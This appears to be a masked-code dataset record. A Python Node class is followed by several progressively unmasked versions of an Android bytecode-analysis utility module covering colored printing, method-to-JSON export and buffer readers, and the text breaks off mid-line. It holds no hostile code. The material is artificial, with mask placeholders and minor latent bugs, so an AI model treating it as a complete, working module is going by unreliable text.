    """A display-graph node: numeric id, title string, and child list."""

    def __init__(self, n, s):
        self.id = n
        self.title = s
        self.children = []  # child Nodes; starts empty
|
flexible
|
{
"blob_id": "2e6f04c3ff3e47a2c3e9f6a7d93e7ce2955a2756",
"index": 8354,
"step-1": "<mask token>\n\n\nclass SVs(object):\n\n def __init__(self, size, ntuple, buff):\n self.__size = size\n self.__value = ntuple._make(unpack(self.__size, buff))\n\n def _get(self):\n l = []\n for i in self.__value._fields:\n l.append(getattr(self.__value, i))\n return pack(self.__size, *l)\n <mask token>\n\n def get_value_buff(self):\n return self._get()\n\n def get_value(self):\n return self.__value\n\n def set_value(self, attr):\n self.__value = self.__value._replace(**attr)\n <mask token>\n\n\n<mask token>\n\n\nclass MethodBC(object):\n\n def show(self, value):\n getattr(self, 'show_' + value)()\n\n\nclass BuffHandle(object):\n\n def __init__(self, buff):\n self.__buff = bytearray(buff)\n self.__idx = 0\n\n def size(self):\n return len(self.__buff)\n\n def set_idx(self, idx):\n self.__idx = idx\n\n def get_idx(self):\n return self.__idx\n\n def readNullString(self, size):\n data = self.read(size)\n return data\n\n def read_b(self, size):\n return self.__buff[self.__idx:self.__idx + size]\n\n def read_at(self, offset, size):\n return self.__buff[offset:offset + size]\n\n def read(self, size):\n if isinstance(size, SV):\n size = size.value\n buff = self.__buff[self.__idx:self.__idx + size]\n self.__idx += size\n return buff\n\n def end(self):\n return self.__idx == len(self.__buff)\n\n\nclass Buff(object):\n\n def __init__(self, offset, buff):\n self.offset = offset\n self.buff = buff\n self.size = len(buff)\n\n\nclass _Bytecode(object):\n\n def __init__(self, buff):\n self.__buff = bytearray(buff)\n self.__idx = 0\n\n def read(self, size):\n if isinstance(size, SV):\n size = size.value\n buff = self.__buff[self.__idx:self.__idx + size]\n self.__idx += size\n return buff\n\n def readat(self, off):\n if isinstance(off, SV):\n off = off.value\n return self.__buff[off:]\n\n def read_b(self, size):\n return self.__buff[self.__idx:self.__idx + size]\n\n def set_idx(self, idx):\n self.__idx = idx\n\n def get_idx(self):\n return self.__idx\n\n def add_idx(self, 
idx):\n self.__idx += idx\n\n def register(self, type_register, fct):\n self.__registers[type_register].append(fct)\n\n def get_buff(self):\n return self.__buff\n\n def length_buff(self):\n return len(self.__buff)\n\n def set_buff(self, buff):\n self.__buff = buff\n\n def save(self, filename):\n buff = self._save()\n with open(filename, 'wb') as fd:\n fd.write(buff)\n\n\n<mask token>\n\n\nclass Node(object):\n\n def __init__(self, n, s):\n self.id = n\n self.title = s\n self.children = []\n",
"step-2": "<mask token>\n\n\ndef disable_print_colors():\n colors = save_colors()\n remove_colors()\n return colors\n\n\n<mask token>\n\n\ndef Warning(msg):\n warning(msg)\n\n\ndef _PrintBanner():\n print_fct = CONF['PRINT_FCT']\n print_fct('*' * 75 + '\\n')\n\n\n<mask token>\n\n\ndef _PrintNote(note, tab=0):\n print_fct = CONF['PRINT_FCT']\n note_color = CONF['COLORS']['NOTE']\n normal_color = CONF['COLORS']['NORMAL']\n print_fct('\\t' * tab + '%s# %s%s' % (note_color, note, normal_color) + '\\n'\n )\n\n\n<mask token>\n\n\ndef _PrintXRef(tag, items):\n print_fct = CONF['PRINT_FCT']\n for i in items:\n print_fct('%s: %s %s %s %s\\n' % (tag, i[0].get_class_name(), i[0].\n get_name(), i[0].get_descriptor(), ' '.join('%x' % j.get_idx() for\n j in i[1])))\n\n\n<mask token>\n\n\ndef _PrintDefault(msg):\n print_fct = CONF['PRINT_FCT']\n print_fct(msg)\n\n\ndef PrettyShow(m_a, basic_blocks, notes={}):\n idx = 0\n nb = 0\n offset_color = CONF['COLORS']['OFFSET']\n offset_addr_color = CONF['COLORS']['OFFSET_ADDR']\n instruction_name_color = CONF['COLORS']['INSTRUCTION_NAME']\n branch_false_color = CONF['COLORS']['BRANCH_FALSE']\n branch_true_color = CONF['COLORS']['BRANCH_TRUE']\n branch_color = CONF['COLORS']['BRANCH']\n exception_color = CONF['COLORS']['EXCEPTION']\n bb_color = CONF['COLORS']['BB']\n normal_color = CONF['COLORS']['NORMAL']\n print_fct = CONF['PRINT_FCT']\n colors = CONF['COLORS']['OUTPUT']\n for i in basic_blocks:\n print_fct('%s%s%s : \\n' % (bb_color, i.get_name(), normal_color))\n instructions = i.get_instructions()\n for ins in instructions:\n if nb in notes:\n for note in notes[nb]:\n _PrintNote(note, 1)\n print_fct('\\t%s%-3d%s(%s%08x%s) ' % (offset_color, nb,\n normal_color, offset_addr_color, idx, normal_color))\n print_fct('%s%-20s%s' % (instruction_name_color, ins.get_name(),\n normal_color))\n operands = ins.get_operands()\n print_fct('%s' % ', '.join(m_a.get_vm().colorize_operands(\n operands, colors)))\n op_value = ins.get_op_value()\n if ins 
== instructions[-1] and i.childs:\n print_fct(' ')\n if (op_value == 43 or op_value == 44) and len(i.childs) > 1:\n values = i.get_special_ins(idx).get_values()\n print_fct('%s[ D:%s%s ' % (branch_false_color, i.childs\n [0][2].get_name(), branch_color))\n print_fct(' '.join('%d:%s' % (values[j], i.childs[j + 1\n ][2].get_name()) for j in range(0, len(i.childs) - \n 1)) + ' ]%s' % normal_color)\n elif len(i.childs) == 2:\n print_fct('%s[ %s%s ' % (branch_false_color, i.childs[0\n ][2].get_name(), branch_true_color))\n print_fct(' '.join('%s' % c[2].get_name() for c in i.\n childs[1:]) + ' ]%s' % normal_color)\n else:\n print_fct('%s[ ' % branch_color + ' '.join('%s' % c[2].\n get_name() for c in i.childs) + ' ]%s' % normal_color)\n idx += ins.get_length()\n nb += 1\n print_fct('\\n')\n if i.get_exception_analysis():\n print_fct('\\t%s%s%s\\n' % (exception_color, i.exception_analysis\n .show_buff(), normal_color))\n print_fct('\\n')\n\n\nclass TmpBlock(object):\n\n def __init__(self, name):\n self.name = name\n\n def get_name(self):\n return self.name\n\n\ndef method2json(mx, directed_graph=False):\n if directed_graph:\n return method2json_direct(mx)\n return method2json_undirect(mx)\n\n\ndef method2json_undirect(mx):\n d = {}\n reports = []\n d['reports'] = reports\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n cblock = {}\n cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()\n cblock['registers'] = mx.get_method().get_code().get_registers_size()\n cblock['instructions'] = []\n ins_idx = DVMBasicMethodBlock.start\n for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(\n ):\n c_ins = {}\n c_ins['idx'] = ins_idx\n c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()\n c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(\n ins_idx)\n cblock['instructions'].append(c_ins)\n ins_idx += DVMBasicMethodBlockInstruction.get_length()\n cblock['Edge'] = []\n for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:\n 
cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())\n reports.append(cblock)\n return json.dumps(d)\n\n\ndef method2json_direct(mx):\n d = {}\n reports = []\n d['reports'] = reports\n hooks = {}\n l = []\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n for index, DVMBasicMethodBlockChild in enumerate(DVMBasicMethodBlock\n .childs):\n if DVMBasicMethodBlock.get_name() == DVMBasicMethodBlockChild[-1\n ].get_name():\n preblock = TmpBlock(DVMBasicMethodBlock.get_name() + '-pre')\n cnblock = {}\n cnblock['BasicBlockId'] = DVMBasicMethodBlock.get_name(\n ) + '-pre'\n cnblock['start'] = DVMBasicMethodBlock.start\n cnblock['notes'] = []\n cnblock['Edge'] = [DVMBasicMethodBlock.get_name()]\n cnblock['registers'] = 0\n cnblock['instructions'] = []\n cnblock['info_bb'] = 0\n l.append(cnblock)\n for parent in DVMBasicMethodBlock.fathers:\n hooks[parent[-1].get_name()] = []\n hooks[parent[-1].get_name()].append(preblock)\n for idx, child in enumerate(parent[-1].childs):\n if child[-1].get_name(\n ) == DVMBasicMethodBlock.get_name():\n hooks[parent[-1].get_name()].append(child[-1])\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n cblock = {}\n cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()\n cblock['start'] = DVMBasicMethodBlock.start\n cblock['notes'] = DVMBasicMethodBlock.get_notes()\n cblock['registers'] = mx.get_method().get_code().get_registers_size()\n cblock['instructions'] = []\n ins_idx = DVMBasicMethodBlock.start\n last_instru = None\n for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(\n ):\n c_ins = {}\n c_ins['idx'] = ins_idx\n c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()\n c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(\n ins_idx)\n c_ins['formatted_operands'\n ] = DVMBasicMethodBlockInstruction.get_formatted_operands()\n cblock['instructions'].append(c_ins)\n if DVMBasicMethodBlockInstruction.get_op_value(\n ) == 43 or DVMBasicMethodBlockInstruction.get_op_value() == 44:\n values 
= DVMBasicMethodBlock.get_special_ins(ins_idx)\n cblock['info_next'] = values.get_values()\n ins_idx += DVMBasicMethodBlockInstruction.get_length()\n last_instru = DVMBasicMethodBlockInstruction\n cblock['info_bb'] = 0\n if DVMBasicMethodBlock.childs:\n if len(DVMBasicMethodBlock.childs) > 1:\n cblock['info_bb'] = 1\n if last_instru.get_op_value() == 43 or last_instru.get_op_value(\n ) == 44:\n cblock['info_bb'] = 2\n cblock['Edge'] = []\n for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:\n ok = False\n if DVMBasicMethodBlock.get_name() in hooks:\n if DVMBasicMethodBlockChild[-1] in hooks[DVMBasicMethodBlock\n .get_name()]:\n ok = True\n cblock['Edge'].append(hooks[DVMBasicMethodBlock.\n get_name()][0].get_name())\n if not ok:\n cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())\n exception_analysis = DVMBasicMethodBlock.get_exception_analysis()\n if exception_analysis:\n cblock['Exceptions'] = exception_analysis.get()\n reports.append(cblock)\n reports.extend(l)\n return json.dumps(d)\n\n\nclass SV(object):\n\n def __init__(self, size, buff):\n self.__size = size\n self.__value = unpack(self.__size, buff)[0]\n\n def _get(self):\n return pack(self.__size, self.__value)\n\n def __str__(self):\n return '0x%x' % self.__value\n\n def __int__(self):\n return self.__value\n\n def get_value_buff(self):\n return self._get()\n\n def get_value(self):\n return self.__value\n\n def set_value(self, attr):\n self.__value = attr\n\n\nclass SVs(object):\n\n def __init__(self, size, ntuple, buff):\n self.__size = size\n self.__value = ntuple._make(unpack(self.__size, buff))\n\n def _get(self):\n l = []\n for i in self.__value._fields:\n l.append(getattr(self.__value, i))\n return pack(self.__size, *l)\n\n def _export(self):\n return [x for x in self.__value._fields]\n\n def get_value_buff(self):\n return self._get()\n\n def get_value(self):\n return self.__value\n\n def set_value(self, attr):\n self.__value = self.__value._replace(**attr)\n\n def 
__str__(self):\n return self.__value.__str__()\n\n\n<mask token>\n\n\nclass MethodBC(object):\n\n def show(self, value):\n getattr(self, 'show_' + value)()\n\n\nclass BuffHandle(object):\n\n def __init__(self, buff):\n self.__buff = bytearray(buff)\n self.__idx = 0\n\n def size(self):\n return len(self.__buff)\n\n def set_idx(self, idx):\n self.__idx = idx\n\n def get_idx(self):\n return self.__idx\n\n def readNullString(self, size):\n data = self.read(size)\n return data\n\n def read_b(self, size):\n return self.__buff[self.__idx:self.__idx + size]\n\n def read_at(self, offset, size):\n return self.__buff[offset:offset + size]\n\n def read(self, size):\n if isinstance(size, SV):\n size = size.value\n buff = self.__buff[self.__idx:self.__idx + size]\n self.__idx += size\n return buff\n\n def end(self):\n return self.__idx == len(self.__buff)\n\n\nclass Buff(object):\n\n def __init__(self, offset, buff):\n self.offset = offset\n self.buff = buff\n self.size = len(buff)\n\n\nclass _Bytecode(object):\n\n def __init__(self, buff):\n self.__buff = bytearray(buff)\n self.__idx = 0\n\n def read(self, size):\n if isinstance(size, SV):\n size = size.value\n buff = self.__buff[self.__idx:self.__idx + size]\n self.__idx += size\n return buff\n\n def readat(self, off):\n if isinstance(off, SV):\n off = off.value\n return self.__buff[off:]\n\n def read_b(self, size):\n return self.__buff[self.__idx:self.__idx + size]\n\n def set_idx(self, idx):\n self.__idx = idx\n\n def get_idx(self):\n return self.__idx\n\n def add_idx(self, idx):\n self.__idx += idx\n\n def register(self, type_register, fct):\n self.__registers[type_register].append(fct)\n\n def get_buff(self):\n return self.__buff\n\n def length_buff(self):\n return len(self.__buff)\n\n def set_buff(self, buff):\n self.__buff = buff\n\n def save(self, filename):\n buff = self._save()\n with open(filename, 'wb') as fd:\n fd.write(buff)\n\n\ndef FormatClassToJava(input):\n \"\"\"\n Transoform a typical xml format class into 
java format\n\n :param input: the input class name\n :rtype: string\n \"\"\"\n return 'L' + input.replace('.', '/') + ';'\n\n\ndef FormatClassToPython(input):\n i = input[:-1]\n i = i.replace('/', '_')\n i = i.replace('$', '_')\n return i\n\n\ndef FormatNameToPython(input):\n i = input.replace('<', '')\n i = i.replace('>', '')\n i = i.replace('$', '_')\n return i\n\n\ndef FormatDescriptorToPython(input):\n i = input.replace('/', '_')\n i = i.replace(';', '')\n i = i.replace('[', '')\n i = i.replace('(', '')\n i = i.replace(')', '')\n i = i.replace(' ', '')\n i = i.replace('$', '')\n return i\n\n\nclass Node(object):\n\n def __init__(self, n, s):\n self.id = n\n self.title = s\n self.children = []\n",
"step-3": "<mask token>\n\n\ndef disable_print_colors():\n colors = save_colors()\n remove_colors()\n return colors\n\n\ndef enable_print_colors(colors):\n enable_colors(colors)\n\n\n<mask token>\n\n\ndef Warning(msg):\n warning(msg)\n\n\ndef _PrintBanner():\n print_fct = CONF['PRINT_FCT']\n print_fct('*' * 75 + '\\n')\n\n\n<mask token>\n\n\ndef _PrintNote(note, tab=0):\n print_fct = CONF['PRINT_FCT']\n note_color = CONF['COLORS']['NOTE']\n normal_color = CONF['COLORS']['NORMAL']\n print_fct('\\t' * tab + '%s# %s%s' % (note_color, note, normal_color) + '\\n'\n )\n\n\n<mask token>\n\n\ndef _PrintXRef(tag, items):\n print_fct = CONF['PRINT_FCT']\n for i in items:\n print_fct('%s: %s %s %s %s\\n' % (tag, i[0].get_class_name(), i[0].\n get_name(), i[0].get_descriptor(), ' '.join('%x' % j.get_idx() for\n j in i[1])))\n\n\n<mask token>\n\n\ndef _PrintDefault(msg):\n print_fct = CONF['PRINT_FCT']\n print_fct(msg)\n\n\ndef PrettyShow(m_a, basic_blocks, notes={}):\n idx = 0\n nb = 0\n offset_color = CONF['COLORS']['OFFSET']\n offset_addr_color = CONF['COLORS']['OFFSET_ADDR']\n instruction_name_color = CONF['COLORS']['INSTRUCTION_NAME']\n branch_false_color = CONF['COLORS']['BRANCH_FALSE']\n branch_true_color = CONF['COLORS']['BRANCH_TRUE']\n branch_color = CONF['COLORS']['BRANCH']\n exception_color = CONF['COLORS']['EXCEPTION']\n bb_color = CONF['COLORS']['BB']\n normal_color = CONF['COLORS']['NORMAL']\n print_fct = CONF['PRINT_FCT']\n colors = CONF['COLORS']['OUTPUT']\n for i in basic_blocks:\n print_fct('%s%s%s : \\n' % (bb_color, i.get_name(), normal_color))\n instructions = i.get_instructions()\n for ins in instructions:\n if nb in notes:\n for note in notes[nb]:\n _PrintNote(note, 1)\n print_fct('\\t%s%-3d%s(%s%08x%s) ' % (offset_color, nb,\n normal_color, offset_addr_color, idx, normal_color))\n print_fct('%s%-20s%s' % (instruction_name_color, ins.get_name(),\n normal_color))\n operands = ins.get_operands()\n print_fct('%s' % ', 
'.join(m_a.get_vm().colorize_operands(\n operands, colors)))\n op_value = ins.get_op_value()\n if ins == instructions[-1] and i.childs:\n print_fct(' ')\n if (op_value == 43 or op_value == 44) and len(i.childs) > 1:\n values = i.get_special_ins(idx).get_values()\n print_fct('%s[ D:%s%s ' % (branch_false_color, i.childs\n [0][2].get_name(), branch_color))\n print_fct(' '.join('%d:%s' % (values[j], i.childs[j + 1\n ][2].get_name()) for j in range(0, len(i.childs) - \n 1)) + ' ]%s' % normal_color)\n elif len(i.childs) == 2:\n print_fct('%s[ %s%s ' % (branch_false_color, i.childs[0\n ][2].get_name(), branch_true_color))\n print_fct(' '.join('%s' % c[2].get_name() for c in i.\n childs[1:]) + ' ]%s' % normal_color)\n else:\n print_fct('%s[ ' % branch_color + ' '.join('%s' % c[2].\n get_name() for c in i.childs) + ' ]%s' % normal_color)\n idx += ins.get_length()\n nb += 1\n print_fct('\\n')\n if i.get_exception_analysis():\n print_fct('\\t%s%s%s\\n' % (exception_color, i.exception_analysis\n .show_buff(), normal_color))\n print_fct('\\n')\n\n\nclass TmpBlock(object):\n\n def __init__(self, name):\n self.name = name\n\n def get_name(self):\n return self.name\n\n\ndef method2json(mx, directed_graph=False):\n if directed_graph:\n return method2json_direct(mx)\n return method2json_undirect(mx)\n\n\ndef method2json_undirect(mx):\n d = {}\n reports = []\n d['reports'] = reports\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n cblock = {}\n cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()\n cblock['registers'] = mx.get_method().get_code().get_registers_size()\n cblock['instructions'] = []\n ins_idx = DVMBasicMethodBlock.start\n for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(\n ):\n c_ins = {}\n c_ins['idx'] = ins_idx\n c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()\n c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(\n ins_idx)\n cblock['instructions'].append(c_ins)\n ins_idx += 
DVMBasicMethodBlockInstruction.get_length()\n cblock['Edge'] = []\n for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:\n cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())\n reports.append(cblock)\n return json.dumps(d)\n\n\ndef method2json_direct(mx):\n d = {}\n reports = []\n d['reports'] = reports\n hooks = {}\n l = []\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n for index, DVMBasicMethodBlockChild in enumerate(DVMBasicMethodBlock\n .childs):\n if DVMBasicMethodBlock.get_name() == DVMBasicMethodBlockChild[-1\n ].get_name():\n preblock = TmpBlock(DVMBasicMethodBlock.get_name() + '-pre')\n cnblock = {}\n cnblock['BasicBlockId'] = DVMBasicMethodBlock.get_name(\n ) + '-pre'\n cnblock['start'] = DVMBasicMethodBlock.start\n cnblock['notes'] = []\n cnblock['Edge'] = [DVMBasicMethodBlock.get_name()]\n cnblock['registers'] = 0\n cnblock['instructions'] = []\n cnblock['info_bb'] = 0\n l.append(cnblock)\n for parent in DVMBasicMethodBlock.fathers:\n hooks[parent[-1].get_name()] = []\n hooks[parent[-1].get_name()].append(preblock)\n for idx, child in enumerate(parent[-1].childs):\n if child[-1].get_name(\n ) == DVMBasicMethodBlock.get_name():\n hooks[parent[-1].get_name()].append(child[-1])\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n cblock = {}\n cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()\n cblock['start'] = DVMBasicMethodBlock.start\n cblock['notes'] = DVMBasicMethodBlock.get_notes()\n cblock['registers'] = mx.get_method().get_code().get_registers_size()\n cblock['instructions'] = []\n ins_idx = DVMBasicMethodBlock.start\n last_instru = None\n for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(\n ):\n c_ins = {}\n c_ins['idx'] = ins_idx\n c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()\n c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(\n ins_idx)\n c_ins['formatted_operands'\n ] = DVMBasicMethodBlockInstruction.get_formatted_operands()\n 
cblock['instructions'].append(c_ins)\n if DVMBasicMethodBlockInstruction.get_op_value(\n ) == 43 or DVMBasicMethodBlockInstruction.get_op_value() == 44:\n values = DVMBasicMethodBlock.get_special_ins(ins_idx)\n cblock['info_next'] = values.get_values()\n ins_idx += DVMBasicMethodBlockInstruction.get_length()\n last_instru = DVMBasicMethodBlockInstruction\n cblock['info_bb'] = 0\n if DVMBasicMethodBlock.childs:\n if len(DVMBasicMethodBlock.childs) > 1:\n cblock['info_bb'] = 1\n if last_instru.get_op_value() == 43 or last_instru.get_op_value(\n ) == 44:\n cblock['info_bb'] = 2\n cblock['Edge'] = []\n for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:\n ok = False\n if DVMBasicMethodBlock.get_name() in hooks:\n if DVMBasicMethodBlockChild[-1] in hooks[DVMBasicMethodBlock\n .get_name()]:\n ok = True\n cblock['Edge'].append(hooks[DVMBasicMethodBlock.\n get_name()][0].get_name())\n if not ok:\n cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())\n exception_analysis = DVMBasicMethodBlock.get_exception_analysis()\n if exception_analysis:\n cblock['Exceptions'] = exception_analysis.get()\n reports.append(cblock)\n reports.extend(l)\n return json.dumps(d)\n\n\nclass SV(object):\n\n def __init__(self, size, buff):\n self.__size = size\n self.__value = unpack(self.__size, buff)[0]\n\n def _get(self):\n return pack(self.__size, self.__value)\n\n def __str__(self):\n return '0x%x' % self.__value\n\n def __int__(self):\n return self.__value\n\n def get_value_buff(self):\n return self._get()\n\n def get_value(self):\n return self.__value\n\n def set_value(self, attr):\n self.__value = attr\n\n\nclass SVs(object):\n\n def __init__(self, size, ntuple, buff):\n self.__size = size\n self.__value = ntuple._make(unpack(self.__size, buff))\n\n def _get(self):\n l = []\n for i in self.__value._fields:\n l.append(getattr(self.__value, i))\n return pack(self.__size, *l)\n\n def _export(self):\n return [x for x in self.__value._fields]\n\n def get_value_buff(self):\n 
return self._get()\n\n def get_value(self):\n return self.__value\n\n def set_value(self, attr):\n self.__value = self.__value._replace(**attr)\n\n def __str__(self):\n return self.__value.__str__()\n\n\n<mask token>\n\n\nclass MethodBC(object):\n\n def show(self, value):\n getattr(self, 'show_' + value)()\n\n\nclass BuffHandle(object):\n\n def __init__(self, buff):\n self.__buff = bytearray(buff)\n self.__idx = 0\n\n def size(self):\n return len(self.__buff)\n\n def set_idx(self, idx):\n self.__idx = idx\n\n def get_idx(self):\n return self.__idx\n\n def readNullString(self, size):\n data = self.read(size)\n return data\n\n def read_b(self, size):\n return self.__buff[self.__idx:self.__idx + size]\n\n def read_at(self, offset, size):\n return self.__buff[offset:offset + size]\n\n def read(self, size):\n if isinstance(size, SV):\n size = size.value\n buff = self.__buff[self.__idx:self.__idx + size]\n self.__idx += size\n return buff\n\n def end(self):\n return self.__idx == len(self.__buff)\n\n\nclass Buff(object):\n\n def __init__(self, offset, buff):\n self.offset = offset\n self.buff = buff\n self.size = len(buff)\n\n\nclass _Bytecode(object):\n\n def __init__(self, buff):\n self.__buff = bytearray(buff)\n self.__idx = 0\n\n def read(self, size):\n if isinstance(size, SV):\n size = size.value\n buff = self.__buff[self.__idx:self.__idx + size]\n self.__idx += size\n return buff\n\n def readat(self, off):\n if isinstance(off, SV):\n off = off.value\n return self.__buff[off:]\n\n def read_b(self, size):\n return self.__buff[self.__idx:self.__idx + size]\n\n def set_idx(self, idx):\n self.__idx = idx\n\n def get_idx(self):\n return self.__idx\n\n def add_idx(self, idx):\n self.__idx += idx\n\n def register(self, type_register, fct):\n self.__registers[type_register].append(fct)\n\n def get_buff(self):\n return self.__buff\n\n def length_buff(self):\n return len(self.__buff)\n\n def set_buff(self, buff):\n self.__buff = buff\n\n def save(self, filename):\n buff = 
self._save()\n with open(filename, 'wb') as fd:\n fd.write(buff)\n\n\ndef FormatClassToJava(input):\n \"\"\"\n Transoform a typical xml format class into java format\n\n :param input: the input class name\n :rtype: string\n \"\"\"\n return 'L' + input.replace('.', '/') + ';'\n\n\ndef FormatClassToPython(input):\n i = input[:-1]\n i = i.replace('/', '_')\n i = i.replace('$', '_')\n return i\n\n\ndef FormatNameToPython(input):\n i = input.replace('<', '')\n i = i.replace('>', '')\n i = i.replace('$', '_')\n return i\n\n\ndef FormatDescriptorToPython(input):\n i = input.replace('/', '_')\n i = i.replace(';', '')\n i = i.replace('[', '')\n i = i.replace('(', '')\n i = i.replace(')', '')\n i = i.replace(' ', '')\n i = i.replace('$', '')\n return i\n\n\nclass Node(object):\n\n def __init__(self, n, s):\n self.id = n\n self.title = s\n self.children = []\n",
"step-4": "<mask token>\n\n\ndef disable_print_colors():\n colors = save_colors()\n remove_colors()\n return colors\n\n\ndef enable_print_colors(colors):\n enable_colors(colors)\n\n\n<mask token>\n\n\ndef Warning(msg):\n warning(msg)\n\n\ndef _PrintBanner():\n print_fct = CONF['PRINT_FCT']\n print_fct('*' * 75 + '\\n')\n\n\ndef _PrintSubBanner(title=None):\n print_fct = CONF['PRINT_FCT']\n if title == None:\n print_fct('#' * 20 + '\\n')\n else:\n print_fct('#' * 10 + ' ' + title + '\\n')\n\n\ndef _PrintNote(note, tab=0):\n print_fct = CONF['PRINT_FCT']\n note_color = CONF['COLORS']['NOTE']\n normal_color = CONF['COLORS']['NORMAL']\n print_fct('\\t' * tab + '%s# %s%s' % (note_color, note, normal_color) + '\\n'\n )\n\n\n<mask token>\n\n\ndef _PrintXRef(tag, items):\n print_fct = CONF['PRINT_FCT']\n for i in items:\n print_fct('%s: %s %s %s %s\\n' % (tag, i[0].get_class_name(), i[0].\n get_name(), i[0].get_descriptor(), ' '.join('%x' % j.get_idx() for\n j in i[1])))\n\n\n<mask token>\n\n\ndef _PrintDefault(msg):\n print_fct = CONF['PRINT_FCT']\n print_fct(msg)\n\n\ndef PrettyShow(m_a, basic_blocks, notes={}):\n idx = 0\n nb = 0\n offset_color = CONF['COLORS']['OFFSET']\n offset_addr_color = CONF['COLORS']['OFFSET_ADDR']\n instruction_name_color = CONF['COLORS']['INSTRUCTION_NAME']\n branch_false_color = CONF['COLORS']['BRANCH_FALSE']\n branch_true_color = CONF['COLORS']['BRANCH_TRUE']\n branch_color = CONF['COLORS']['BRANCH']\n exception_color = CONF['COLORS']['EXCEPTION']\n bb_color = CONF['COLORS']['BB']\n normal_color = CONF['COLORS']['NORMAL']\n print_fct = CONF['PRINT_FCT']\n colors = CONF['COLORS']['OUTPUT']\n for i in basic_blocks:\n print_fct('%s%s%s : \\n' % (bb_color, i.get_name(), normal_color))\n instructions = i.get_instructions()\n for ins in instructions:\n if nb in notes:\n for note in notes[nb]:\n _PrintNote(note, 1)\n print_fct('\\t%s%-3d%s(%s%08x%s) ' % (offset_color, nb,\n normal_color, offset_addr_color, idx, normal_color))\n print_fct('%s%-20s%s' 
% (instruction_name_color, ins.get_name(),\n normal_color))\n operands = ins.get_operands()\n print_fct('%s' % ', '.join(m_a.get_vm().colorize_operands(\n operands, colors)))\n op_value = ins.get_op_value()\n if ins == instructions[-1] and i.childs:\n print_fct(' ')\n if (op_value == 43 or op_value == 44) and len(i.childs) > 1:\n values = i.get_special_ins(idx).get_values()\n print_fct('%s[ D:%s%s ' % (branch_false_color, i.childs\n [0][2].get_name(), branch_color))\n print_fct(' '.join('%d:%s' % (values[j], i.childs[j + 1\n ][2].get_name()) for j in range(0, len(i.childs) - \n 1)) + ' ]%s' % normal_color)\n elif len(i.childs) == 2:\n print_fct('%s[ %s%s ' % (branch_false_color, i.childs[0\n ][2].get_name(), branch_true_color))\n print_fct(' '.join('%s' % c[2].get_name() for c in i.\n childs[1:]) + ' ]%s' % normal_color)\n else:\n print_fct('%s[ ' % branch_color + ' '.join('%s' % c[2].\n get_name() for c in i.childs) + ' ]%s' % normal_color)\n idx += ins.get_length()\n nb += 1\n print_fct('\\n')\n if i.get_exception_analysis():\n print_fct('\\t%s%s%s\\n' % (exception_color, i.exception_analysis\n .show_buff(), normal_color))\n print_fct('\\n')\n\n\nclass TmpBlock(object):\n\n def __init__(self, name):\n self.name = name\n\n def get_name(self):\n return self.name\n\n\ndef method2json(mx, directed_graph=False):\n if directed_graph:\n return method2json_direct(mx)\n return method2json_undirect(mx)\n\n\ndef method2json_undirect(mx):\n d = {}\n reports = []\n d['reports'] = reports\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n cblock = {}\n cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()\n cblock['registers'] = mx.get_method().get_code().get_registers_size()\n cblock['instructions'] = []\n ins_idx = DVMBasicMethodBlock.start\n for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(\n ):\n c_ins = {}\n c_ins['idx'] = ins_idx\n c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()\n c_ins['operands'] = 
DVMBasicMethodBlockInstruction.get_operands(\n ins_idx)\n cblock['instructions'].append(c_ins)\n ins_idx += DVMBasicMethodBlockInstruction.get_length()\n cblock['Edge'] = []\n for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:\n cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())\n reports.append(cblock)\n return json.dumps(d)\n\n\ndef method2json_direct(mx):\n d = {}\n reports = []\n d['reports'] = reports\n hooks = {}\n l = []\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n for index, DVMBasicMethodBlockChild in enumerate(DVMBasicMethodBlock\n .childs):\n if DVMBasicMethodBlock.get_name() == DVMBasicMethodBlockChild[-1\n ].get_name():\n preblock = TmpBlock(DVMBasicMethodBlock.get_name() + '-pre')\n cnblock = {}\n cnblock['BasicBlockId'] = DVMBasicMethodBlock.get_name(\n ) + '-pre'\n cnblock['start'] = DVMBasicMethodBlock.start\n cnblock['notes'] = []\n cnblock['Edge'] = [DVMBasicMethodBlock.get_name()]\n cnblock['registers'] = 0\n cnblock['instructions'] = []\n cnblock['info_bb'] = 0\n l.append(cnblock)\n for parent in DVMBasicMethodBlock.fathers:\n hooks[parent[-1].get_name()] = []\n hooks[parent[-1].get_name()].append(preblock)\n for idx, child in enumerate(parent[-1].childs):\n if child[-1].get_name(\n ) == DVMBasicMethodBlock.get_name():\n hooks[parent[-1].get_name()].append(child[-1])\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n cblock = {}\n cblock['BasicBlockId'] = 